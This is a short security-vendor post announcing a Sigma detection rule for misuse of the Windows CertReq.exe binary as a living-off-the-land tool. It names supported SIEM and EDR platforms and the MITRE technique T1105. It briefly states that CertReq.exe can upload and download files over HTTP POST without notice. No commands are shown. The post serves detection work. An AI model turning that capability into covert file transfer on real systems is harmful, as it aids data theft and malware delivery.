Threat Hunting Content: CertReq.exe Lolbin

Living off the Land binaries (Lolbins) are legitimate binaries that advanced adversaries often misuse to perform actions beyond their original purpose. Cybercriminals actively use them to download malware, to ensure persistence, for data exfiltration, for lateral movement, and more. Just yesterday we wrote about a rule that detects attacks of the Evil Corp group, which also uses Lolbins to deploy WastedLocker ransomware on the maximum number of systems in organizations.

CertReq.exe is present on Windows and its intended use is to assist with the creation and installation of certificates. It is not one of the Lolbins which is overly exploited by cybercriminals, but it can be used to perform malicious actions without attracting the attention of security solutions. Cybercriminals can use CertReq.exe to upload and download small files. It can be used to upload a file via HTTP POST, download a file via HTTP POST and save it to disk or show contents. You can read more about CertReq.exe exploitation here.

Den Iuzvik developed and released a new threat hunting Sigma rule that detects possible file upload/download with CertReq.exe: https://tdm.socprime.com/tdm/info/BBbpPolVZpLp/SJcgLnMBQAH5UgbBoihF/?p=1

 

The rule has translations for the following platforms:

SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, ELK Stack, RSA NetWitness, Sumo Logic, Graylog, Humio, LogPoint

EDR: Microsoft Defender ATP, Carbon Black, Elastic Endpoint

 

MITRE ATT&CK: 

Tactics: Command And Control

Techniques: Remote File Copy (T1105)

 

Ready to try out SOC Prime TDM? Sign up for free. Or join Threat Bounty Program to craft your own content and share it with the TDM community.